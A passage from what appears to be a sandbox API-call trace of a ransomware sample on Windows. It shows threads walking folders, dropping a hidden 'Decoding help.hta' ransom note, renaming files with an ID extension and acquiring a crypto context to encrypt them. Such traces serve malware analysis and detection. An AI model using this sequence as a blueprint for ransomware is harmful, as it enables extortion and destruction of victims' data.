ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10bc56d0 [0060.312] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.312] FindNextFileW (in: hFindFile=0x10bc56d0, lpFindFileData=0x2f12fd30 | out: lpFindFileData=0x2f12fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a5e242, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.827] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.827] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.827] FindNextFileW (in: hFindFile=0x10bc56d0, lpFindFileData=0x2f12fd30 | out: lpFindFileData=0x2f12fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x47ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="cpu.js", cAlternateFileName="")) returned 1 [0060.903] lstrcpyW (in: lpString1=0x2aa10db8, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js\\*.*" [0060.903] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js\\*.*") returned 74 [0060.903] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js\\Decoding help.hta" [0060.903] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\js\\decoding help.hta")) returned 0xffffffff [0060.903] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\js\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4b8 [0060.903] WriteFile (in: hFile=0x4b8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2f12fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2f12fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0060.904] CloseHandle (hObject=0x4b8) returned 1 [0060.904] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0060.905] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cpu.js") returned 1 [0060.905] lstrlenW (lpString="cpu.js") returned 6 [0060.905] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js\\*.*" [0060.905] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js\\*.*") returned 74 [0060.905] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js\\", lpString2="cpu.js" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js\\cpu.js") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js\\cpu.js" [0060.905] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js\\cpu.js" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js\\cpu.js") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js\\cpu.js" [0060.905] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js\\cpu.js", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js\\cpu.js.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js\\cpu.js.[ID]g9uZrLhJaygpwRm1[ID]" [0060.905] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js\\cpu.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\js\\cpu.js"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js\\cpu.js.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\js\\cpu.js.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.905] FindNextFileW (in: hFindFile=0x10bc56d0, lpFindFileData=0x2f12fd30 | out: lpFindFileData=0x2f12fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x47ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="cpu.js", cAlternateFileName="")) returned 0 [0060.906] FindClose (in: hFindFile=0x10bc56d0 | out: hFindFile=0x10bc56d0) returned 1 Thread: id = 1012 os_tid = 0xe6c [0060.313] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\*.*", lpFindFileData=0x2f26fd30 | out: lpFindFileData=0x2f26fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a844fb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10bc5710 [0060.313] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.313] FindNextFileW (in: hFindFile=0x10bc5710, lpFindFileData=0x2f26fd30 | out: lpFindFileData=0x2f26fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a844fb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.313] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.313] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.313] FindNextFileW (in: hFindFile=0x10bc5710, lpFindFileData=0x2f26fd30 | out: lpFindFileData=0x2f26fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xbaa2, dwReserved0=0x0, dwReserved1=0x0, cFileName="picturePuzzle.js", cAlternateFileName="")) returned 1 [0060.314] lstrcpyW (in: lpString1=0x1115bb60, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\*.*" [0060.314] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\*.*") returned 84 [0060.314] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\Decoding help.hta" [0060.314] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\js\\decoding help.hta")) returned 0xffffffff [0060.314] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\js\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xc68 [0061.564] WriteFile (in: hFile=0xc68, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2f26fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2f26fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.565] CloseHandle (hObject=0xc68) returned 1 [0061.565] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.565] lstrcmpiW (lpString1="Decoding help.hta", lpString2="picturePuzzle.js") returned -1 [0061.565] lstrlenW (lpString="picturePuzzle.js") returned 16 [0061.565] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\*.*" [0061.565] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\*.*") returned 84 [0061.565] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\", lpString2="picturePuzzle.js" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\picturePuzzle.js") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\picturePuzzle.js" [0061.565] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\picturePuzzle.js" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\picturePuzzle.js") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\picturePuzzle.js" [0061.565] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\picturePuzzle.js", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\picturePuzzle.js.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\picturePuzzle.js.[ID]g9uZrLhJaygpwRm1[ID]" [0061.565] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\picturePuzzle.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\js\\picturepuzzle.js"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\picturePuzzle.js.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\js\\picturepuzzle.js.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0062.527] FindNextFileW (in: hFindFile=0x10bc5710, lpFindFileData=0x2f26fd30 | out: lpFindFileData=0x2f26fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x267e, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.js", cAlternateFileName="")) returned 1 Thread: id = 1013 os_tid = 0xe64 [0060.314] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*.*", lpFindFileData=0x2f3afd30 | out: lpFindFileData=0x2f3afd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x5af83960, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10bc5750 [0060.315] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.315] FindNextFileW (in: hFindFile=0x10bc5750, lpFindFileData=0x2f3afd30 | out: lpFindFileData=0x2f3afd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x5af83960, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.315] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.315] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.315] FindNextFileW (in: hFindFile=0x10bc5750, lpFindFileData=0x2f3afd30 | out: lpFindFileData=0x2f3afd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x5af83960, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0060.315] FindClose (in: hFindFile=0x10bc5750 | out: hFindFile=0x10bc5750) returned 1 Thread: id = 1014 os_tid = 0xcbc [0060.315] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*.*", lpFindFileData=0x2f4efd30 | out: lpFindFileData=0x2f4efd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf96dfdac, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10bc5750 [0060.317] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.317] FindNextFileW (in: hFindFile=0x10bc5750, lpFindFileData=0x2f4efd30 | out: lpFindFileData=0x2f4efd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf96dfdac, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.317] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.317] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.317] FindNextFileW (in: hFindFile=0x10bc5750, lpFindFileData=0x2f4efd30 | out: lpFindFileData=0x2f4efd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7de4960a, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e1692f0, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x92, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0060.317] lstrcpyW (in: lpString1=0x246f54d8, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*.*" [0060.317] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*.*") returned 81 [0060.317] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Decoding help.hta") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Decoding help.hta" [0060.318] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Decoding help.hta" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\decoding help.hta")) returned 0xffffffff [0060.318] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Decoding help.hta" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xc68 [0061.566] WriteFile (in: hFile=0xc68, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2f4efcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2f4efcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.567] CloseHandle (hObject=0xc68) returned 1 [0061.567] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.567] lstrcmpiW (lpString1="Decoding help.hta", lpString2="desktop.ini") returned -1 [0061.567] lstrlenW (lpString="desktop.ini") returned 11 [0061.567] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*.*" [0061.567] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*.*") returned 81 [0061.567] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini" [0061.567] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini" [0061.567] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0061.567] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.568] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xc68 [0061.568] CreateFileMappingA (hFile=0xc68, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xa3c [0061.568] CryptAcquireContextA (phProv=0x2f4efcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 1015 os_tid = 0xccc [0060.320] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*.*", lpFindFileData=0x2f62fd30 | out: lpFindFileData=0x2f62fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10bc5790 [0060.321] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.321] FindNextFileW (in: hFindFile=0x10bc5790, lpFindFileData=0x2f62fd30 | out: lpFindFileData=0x2f62fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.321] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.321] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.321] FindNextFileW (in: hFindFile=0x10bc5790, lpFindFileData=0x2f62fd30 | out: lpFindFileData=0x2f62fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Certificates", cAlternateFileName="CERTIF~1")) returned 1 [0060.321] lstrcmpW (lpString1=".", lpString2="Certificates") returned -1 [0060.321] lstrcmpW (lpString1="..", lpString2="Certificates") returned -1 [0060.321] lstrcmpiW (lpString1="windows", lpString2="Certificates") returned 1 [0060.321] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*.*") 